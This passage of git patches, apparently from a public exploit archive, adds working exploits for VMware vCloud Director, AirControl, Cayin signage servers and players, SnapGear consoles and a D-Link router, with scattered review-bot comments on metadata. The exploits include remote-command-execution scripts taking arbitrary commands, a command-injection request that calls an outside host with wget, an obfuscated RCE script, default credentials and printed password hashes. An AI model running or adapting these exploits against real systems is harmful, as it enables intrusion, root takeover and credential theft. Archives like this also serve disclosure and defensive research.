can\'t find tenant identifier') + return (None,None,None,None) + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return (None,None,None,None) + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return (None,None,None,None) + else: + print('[!] url for login form was not found') + return (None,None,None,None) + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return (None,None,None,None) + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] 
orgId not found') + return (None,None,None,None) + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + if jwt is None: + return + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, 
args.u, args.p, args.c, args.v) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d97c1041..a73d057de 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18163,6 +18163,7 @@ id,file,description,date,author,type,platform,port 48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows, 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware, 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows, +48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, From 533f33f3f4702cb4372efaaba23e3c87dd246c81 Mon Sep 17 00:00:00 2001 
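Review bot: The header block of 48540.py has no `# CVE:` line, although the Technical Details URL it cites ends in CVE-2020-3956 and the other entries in this series carry the field; without it the entry cannot be matched to the vendor advisory by identifier. I would add `# CVE: CVE-2020-3956` under `# Tested On:`. The metadata is also inconsistent between the two files this patch touches: the header says `# Exploit Author: Tomas Melicher` while the `files_exploits.csv` row lists `aaronsvk`, and the CSV title pins the single tested build 9.7.0.15498291 even though the script's own comments branch on Cloud Director 9.* and 10.*, so an affected-version range and a fixed-release line would serve anyone scoping patches better than the one build.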
From: Offensive Security Date: Fri, 5 Jun 2020 05:01:53 +0000 Subject: [PATCH 07/17] DB: 2020-06-05 17 changes to exploits/shellcodes IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path AirControl 1.4.2 - PreAuth Remote Code Execution Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) Clinic Management System 1.0 - Unauthenticated Remote Code Execution Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) Oriol Espinal CMS 1.0 - 'id' SQL Injection Clinic Management System 1.0 - Authenticated Arbitrary File Upload Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Navigate CMS 2.8.7 - Authenticated Directory Traversal D-Link DIR-615 T1 20.10 - CAPTCHA Bypass Online Marriage Registration System 1.0 - Remote Code Execution Cayin Content Management Server 11.0 - Remote Command Injection (root) SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read Cayin Signage Media Player 3.0 - Remote Command Injection (root) Cayin Digital Signage System xPost 2.5 - Remote Command Injection --- exploits/hardware/webapps/48541.py | 30 ++++++ exploits/hardware/webapps/48551.txt | 28 ++++++ exploits/hardware/webapps/48554.txt | 72 ++++++++++++++ exploits/hardware/webapps/48556.txt | 95 +++++++++++++++++++ exploits/java/webapps/48549.py | 138 +++++++++++++++++++++++++++ exploits/multiple/webapps/48553.txt | 139 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48557.py | 130 ++++++++++++++++++++++++++ exploits/multiple/webapps/48558.txt | 121 ++++++++++++++++++++++++ exploits/php/webapps/48542.txt | 20 ++++ exploits/php/webapps/48544.txt | 62 +++++++++++++ exploits/php/webapps/48545.py | 34 +++++++ exploits/php/webapps/48546.txt | 76 +++++++++++++++ exploits/php/webapps/48547.txt | 62 +++++++++++++ exploits/php/webapps/48548.txt | 99 ++++++++++++++++++++ 
exploits/php/webapps/48550.txt | 29 ++++++ exploits/php/webapps/48552.sh | 52 +++++++++++ exploits/windows/local/48543.txt | 53 +++++++++++ files_exploits.csv | 17 ++++ 18 files changed, 1257 insertions(+) create mode 100755 exploits/hardware/webapps/48541.py create mode 100644 exploits/hardware/webapps/48551.txt create mode 100644 exploits/hardware/webapps/48554.txt create mode 100644 exploits/hardware/webapps/48556.txt create mode 100755 exploits/java/webapps/48549.py create mode 100644 exploits/multiple/webapps/48553.txt create mode 100755 exploits/multiple/webapps/48557.py create mode 100644 exploits/multiple/webapps/48558.txt create mode 100644 exploits/php/webapps/48542.txt create mode 100644 exploits/php/webapps/48544.txt create mode 100755 exploits/php/webapps/48545.py create mode 100644 exploits/php/webapps/48546.txt create mode 100644 exploits/php/webapps/48547.txt create mode 100644 exploits/php/webapps/48548.txt create mode 100644 exploits/php/webapps/48550.txt create mode 100755 exploits/php/webapps/48552.sh create mode 100644 exploits/windows/local/48543.txt diff --git a/exploits/hardware/webapps/48541.py b/exploits/hardware/webapps/48541.py new file mode 100755 index 000000000..ccd4be227 --- /dev/null +++ b/exploits/hardware/webapps/48541.py 
@@ -0,0 +1,30 @@ +# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution +# Date: 2020-06-03 +# Exploit Author: 0xd0ff9 vs j3ssie +# Vendor Homepage: https://www.ui.com/ +# Software Link: https://www.ui.com/download/#!utilities +# Version: AirControl <= 1.4.2 +# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml + +import requests +import re +import urllib +import sys + + +print """USAGE: python exploit_aircontrol.py [url] [cmd]""" + + +url = sys.argv[1] +cmd = sys.argv[2] + + +burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" +burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} +r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) + +Locat = r.headers["Location"] + +res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) + +print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res) \ No newline at end of file diff --git a/exploits/hardware/webapps/48551.txt b/exploits/hardware/webapps/48551.txt new file mode 100644 index 000000000..18c04755b --- /dev/null +++ b/exploits/hardware/webapps/48551.txt 
@@ -0,0 +1,28 @@
+# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
+# Date: 2019-10-12
+# Exploit Author: huzaifa hussain
+# Vendor Homepage: https://in.dlink.com/
+# Version: DIR-615 T1 ver:20.10
+# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
+# CVE: CVE-2019-17525
+
+D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
+
+A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
+
+------------------------------------
+D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
+
+ATTACK SCENARIO AND REPRODUCTION STEPS
+
+1: Find the ROUTER LoginPage.
+2: Fill the required login credentials.
+3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
+4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
+5: Set the payloads on target variables i.e. username & password under Payloads Tab.
+5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
+6: Now hit the start attack and you will find the correct credentials.
+
+-------------------------------------
+
+Huzaifa Hussain
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48554.txt b/exploits/hardware/webapps/48554.txt
new file mode 100644
index 000000000..80412aae7
--- /dev/null
+++ b/exploits/hardware/webapps/48554.txt
@@ -0,0 +1,72 @@ +# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) +# Author: LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5567 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php + + +14.05.2020 + +-- + + +CSRF Add Super User: +-------------------- + + + +
+ + + + + + + + + + + + + + +
+ + + +Result /etc/shadow: + +root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh +sshd:!!:100:65534::/home:/bin/false +clamav:!!:103:65534::/home:/bin/false +testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh \ No newline at end of file diff --git a/exploits/hardware/webapps/48556.txt b/exploits/hardware/webapps/48556.txt new file mode 100644 index 000000000..241b68a4f --- /dev/null +++ b/exploits/hardware/webapps/48556.txt @@ -0,0 +1,95 @@ +# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application allows the currently logged-in user to edit the +configuration files in the system using the CGI executable 'edit_config_files' +in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) +are located in the /etc/config/ directory. An attacker can manipulate +the POST request parameters to escape from the restricted environment +by using absolute path and start reading, writing and deleting arbitrary +files on the system. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5568 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php + + +14.05.2020 + +-- + + +Read: +----- + + +
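Review bot: The "Result /etc/shadow" block that closes 48554.txt publishes the password-hash fields of the `root` and `testingus` accounts from the tested appliance. The added account name, its uid/gid and its shell are enough to show that the forged request created a user, so the hash fields could be replaced with a placeholder, for example `root:<hash redacted>:0:0:Super User:/:/bin/sh`. The lines also carry uid, gid, home and shell fields, which looks like passwd rather than shadow layout; if that is the case, the label should name the file that was actually read.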
+ + + + + + +
+ + + + +Write/overwrite/move: +--------------------- + + +
+ + + + + + + + + + +
+ + + + +Delete: +------- + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/java/webapps/48549.py b/exploits/java/webapps/48549.py new file mode 100755 index 000000000..2adda7607 --- /dev/null +++ b/exploits/java/webapps/48549.py 
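Review bot: The `# Title:` line of 48556.txt says "Arbitrary File Read", while the heading below it says "Arbitrary File Read/Write" and the body has Write/overwrite/move and Delete sections, so the title understates the integrity impact for anyone triaging by title. `# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read/Write/Delete (Authenticated)` would match the Desc paragraph, which says the flaw is reachable by "the currently logged-in user". `# Author:LiquidWorm` is also missing the space that the other header fields have.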
@@ -0,0 +1,138 @@ +# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +#!/usr/bin/python + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] 
can\'t find tenant identifier') + return + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: + print('[!] url for login form was not found') + return + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] 
orgId not found') + return + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, args.u, args.p, args.c, args.v) \ No newline at end 
of file diff --git a/exploits/multiple/webapps/48553.txt b/exploits/multiple/webapps/48553.txt new file mode 100644 index 000000000..adbf9fa72 --- /dev/null +++ b/exploits/multiple/webapps/48553.txt 
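Review bot: In `login()`, the verbose branch prints the complete `vcloud_jwt` and `vcloud_session_id` values, so `-v` output copied into a report or ticket carries live session credentials for the tested tenant; printing a prefix only, e.g. `print('[*] jwt token: %s...'%(jwt[:8]))`, keeps the diagnostic without the secret. The argparse usage string also advertises `[--check]`, but no such argument is added to the parser, so the usage text should drop it. `login()` returns a bare `None` on every failure path while `exploit()` unpacks four values from its result, so a failed login ends in a TypeError after the error message has been printed. Indentation is lost in this view, so the exact branch structure is inferred.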
@@ -0,0 +1,139 @@ +# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A +Cayin Content Management Server 11.0 Root Remote Command Injection + + +Vendor: CAYIN Technology Co., Ltd. +Product web page: https://www.cayintech.com +Affected version: CMS-SE v11.0 Build 19179 + CMS-SE v11.0 Build 19025 + CMS-SE v11.0 Build 18325 + CMS Station (CMS-SE-LXC) + CMS-60 v11.0 Build 19025 + CMS-40 v9.0 Build 14197 + CMS-40 v9.0 Build 14099 + CMS-40 v9.0 Build 14093 + CMS-20 v9.0 Build 14197 + CMS-20 v9.0 Build 14092 + CMS v8.2 Build 12199 + CMS v8.0 Build 11175 + CMS v7.5 Build 11175 + +Summary: CAYIN Technology provides Digital Signage +solutions, including media players, servers, and +software designed for the DOOH (Digital Out-of-home) +networks. We develop industrial-grade digital signage +appliances and tailored services so you don't have +to do the hard work. + +Desc: CAYIN CMS suffers from an authenticated OS +semi-blind command injection vulnerability using +default credentials. This can be exploited to inject +and execute arbitrary shell commands as the root +user through the 'NTP_Server_IP' HTTP POST parameter +in system.cgi page. + +Tested on: Apache/1.3.42 (Unix) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5570 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php + + +15.05.2020 + +--- + + +Session created with default credentials (webadmin:bctvadmin). 
+ +HTTP POST Request: +----------------- + +POST /cgi-bin/system.cgi HTTP/1.1 +Host: 192.168.1.3 +Content-Length: 201 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Smith +Origin: http://192.168.1.3 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.3/cgi-bin/system.cgi +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 +Connection: close + + +save_system: 1 +system_date: 2020/5/16 06:36:48 +TIMEZONE: 49 +NTP_Service: 1 +NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) +TEST_NTP: 測試 +reboot1: 1 +reboot_sel1: 4 +reboot_sel2: 1 +reboot_sel3: 1 +font_list: ZH_TW + + +Request recorder @ ZSL: +----------------------- + +Origin of HTTP request: 192.168.1.3:61347 +HTTP GET request to vrfy.zeroscience.mk: + +GET / HTTP/1.0 +User-Agent: MyVoiceIsMyPassportVerifyMe +Host: vrfy.zeroscience.mk +Accept: */* +Connection: Keep-Alive + + +PoC script: +----------- + +import requests + +url = "http://192.168.1.3:80/cgi-bin/system.cgi" + +cookies = {"cy_lang": "ZH_TW", + "cy_us": "67176fd7d3d05812008", + "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", + "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", + "WEB_STR_SYSTEM": "SYSTEM_SETTING", + "cy_cgi_tp": "1591206269_15957"} + +headers = {"Cache-Control": "max-age=0", + "Origin": "http://192.168.1.3", + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Smith", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": "http://192.168.1.3/cgi-bin/system.cgi", + "Accept-Encoding": "gzip, deflate", + 
"Accept-Language": "en-US,en;q=0.9", + "Connection": "close"} + +data = {"save_system": "1", + "system_date": "2020/5/16 06:36:48", + "TIMEZONE": "49", + "NTP_Service": "1", + "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& + "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", + "reboot1": "1", + "reboot_sel1": "4", + "reboot_sel2": "1", + "reboot_sel3": "1", + "font_list": "ZH_TW"} + +requests.post(url, headers=headers, cookies=cookies, data=data) \ No newline at end of file diff --git a/exploits/multiple/webapps/48557.py b/exploits/multiple/webapps/48557.py new file mode 100755 index 000000000..31b0ff35a --- /dev/null +++ b/exploits/multiple/webapps/48557.py 
@@ -0,0 +1,130 @@ +# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Signage Media Player 3.0 Root Remote Command Injection +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: SMP-8000QD v3.0 +# SMP-8000 v3.0 +# SMP-6000 v3.0 Build 19025 +# SMP-6000 v1.0 Build 14246 +# SMP-6000 v1.0 Build 14199 +# SMP-6000 v1.0 Build 14167 +# SMP-6000 v1.0 Build 14097 +# SMP-6000 v1.0 Build 14090 +# SMP-6000 v1.0 Build 14069 +# SMP-6000 v1.0 Build 14062 +# SMP-4000 v1.0 Build 14098 +# SMP-4000 v1.0 Build 14092 +# SMP-4000 v1.0 Build 14087 +# SMP-2310 v3.0 +# SMP-2300 v3.0 Build 19316 +# SMP-2210 v3.0 Build 19025 +# SMP-2200 v3.0 Build 19029 +# SMP-2200 v3.0 Build 19025 +# SMP-2100 v10.0 Build 16228 +# SMP-2100 v3.0 +# SMP-2000 v1.0 Build 14167 +# SMP-2000 v1.0 Build 14087 +# SMP-1000 v1.0 Build 14099 +# SMP-PROPLUS v1.5 Build 10081 +# SMP-WEBPLUS v6.5 Build 11126 +# SMP-WEB4 v2.0 Build 13073 +# SMP-WEB4 v2.0 Build 11175 +# SMP-WEB4 v1.5 Build 11476 +# SMP-WEB4 v1.5 Build 11126 +# SMP-WEB4 v1.0 Build 10301 +# SMP-300 v1.0 Build 14177 +# SMP-200 v1.0 Build 13080 +# SMP-200 v1.0 Build 12331 +# SMP-PRO4 v1.0 +# SMP-NEO2 v1.0 +# SMP-NEO v1.0 +# +# Summary: CAYIN Technology provides Digital Signage +# solutions, including media players, servers, and +# software designed for the DOOH (Digital Out-of-home) +# networks. We develop industrial-grade digital signage +# appliances and tailored services so you don't have +# to do the hard work. +# +# Desc: CAYIN SMP-xxxx suffers from an authenticated +# OS command injection vulnerability using default +# credentials. This can be exploited to inject and +# execute arbitrary shell commands as the root user +# through the 'NTP_Server_IP' HTTP GET parameter in +# system.cgi and wizard_system.cgi pages. 
+# +# ----------------------------------------------------- +# $ ./cayin.py 192.168.1.2 id +# uid=0(root) gid=65534(guest) +# # start sshd +# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd +# $ +# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'" +# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN +# tcp 0 0 :::22 :::* LISTEN +# $ ./cayin.py 192.168.1.2 "cat /etc/passwd" +# root:x:0:0:root:/root:/bin/bash +# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin +# sshd:x:1000:0::/dev/null:/sbin/nologin +# $ +# ----------------------------------------------------- +# +# Tested on: CAYIN Technology KT-Linux v0.99 +# Apache/1.3.42 (Unix) +# Apache/1.3.41 (Unix) +# PHP/5.2.5 +# Linux 2.6.37 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5569 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php +# +# +# 15.05.2020 +# + +import requests +import sys#____ +import re#_____ + +if len(sys.argv) < 3: + print("Cayin SMP WebManager Post-Auth RCE") + print("Usage: ./cayin.py [ip] [cmd]") + sys.exit(17) +else: + ip____address = sys.argv[1] + ex____command = sys.argv[2] + +ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f" +ur____identif += (bytes(ip____address, "utf-8")) +ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69" +ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72" +ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65" +ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54" +ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50" +ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f" +ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f" +ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c" +ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72" +ur____identif += b"\x67\x25\x32\x36" ##########" +ur____identif += (bytes(ex____command, "utf-8")) +ur____identif += b"\x25\x32\x36" ##############" + +ht____request = requests.get(ur____identif, auth = ("webadmin", "admin")) 
